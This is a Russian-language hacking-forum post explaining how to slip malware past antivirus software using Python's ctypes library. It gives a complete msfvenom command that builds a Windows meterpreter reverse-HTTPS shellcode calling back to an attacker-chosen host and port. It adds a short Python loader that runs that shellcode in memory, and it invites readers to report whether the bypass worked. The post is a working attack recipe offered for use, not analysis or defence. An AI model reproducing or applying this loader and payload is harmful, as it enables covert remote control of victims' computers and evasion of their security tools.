• Начинающий хакер, спасибо что зашёл к нам! Для полного удобства рекомендуем Вам сразу же зарегистрироваться. Помните, необходимо придумать сложный пароль к своему логину, в котором будут присутствовать цифры, а так же символы. После регистрации вы сможете пользоваться чатом. Так же не забудьте активировать аккаунт через письмо, высланное вам на почту ! Администрация заботится о каждом из Вас...
  • Для просмотра разделов из категории Private Informations & Programms необходимо купить

Обход антивируса Python(ctypes)

  • Автор темы Автор темы Stupid Developer
  • Дата начала Дата начала
Статус
В этой теме нельзя размещать новые ответы.

Stupid Developer

Гость
S

Stupid Developer

Гость
Не знал в какой раздел написать эту тему, поэтому решил всё таки здесь.
Возможно кто-то, где-то это уже видел, но я на форуме данной темы не замечал, поэтому решил удачно скопипастить её, надеюсь кому-то будет полезно.


Нам понадобиться библиотека ctypes. Суть обхода в том, что эта библа позволяет нам выполнить код С/С++ в нашем питоновском скрипте.
Проделываем следующее:
1) Создаём шеллкод командой:
Код:
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c


8943

(скрин взят так же с другого источника)

Дальше создаём скрипт на питоне следующего вида:
Python:
from ctypes import *

shellcode = ("Тут_копипастим_наш шеллкод_созданный_через_msf_venom");

tralivali = create_string_buffer(shellcode, len(shellcode))
shell = cast(tralivali, CFUNCTYPE(c_void_p))

shell()

8944


8945


Должно получиться как-то так.
Надеюсь данная информация будет полезна тем, кто о неё не знал
Так же попрошу отписаться в теме, кто проверил это и что из этого получилось😉
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу